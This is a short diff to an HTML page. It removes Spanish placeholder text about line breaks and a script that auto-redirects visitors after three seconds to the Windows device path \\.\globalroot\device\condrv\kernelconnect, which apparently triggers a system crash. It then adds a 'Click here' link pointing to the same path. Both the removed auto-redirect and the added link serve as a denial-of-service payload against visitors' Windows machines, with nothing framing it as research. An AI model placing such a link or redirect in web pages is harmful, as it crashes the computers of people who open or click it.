--- a/index.html
+++ b/index.html
@@ -2,16 +2,9 @@
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-<script>
-    setTimeout(function(){location.href="\\.\globalroot\device\condrv\kernelconnect"} , 3000);
-</script>
 
 </head>
 <body>
-     Esta es línea, y a continuación insertamos un salto de línea.<br/>
-         Esta es una línea, y a continuación insertamos un salto de línea.<br/>
-         Esta es una línea, y a continuación insertamos un salto de línea.<br/>
-         <p>Esto es un párrafo.</p>
-         <p>Esto es otro párrafo.</p>
+<a href='\\.\globalroot\device\condrv\kernelconnect'>Click here</a>
 </body>
 </html>
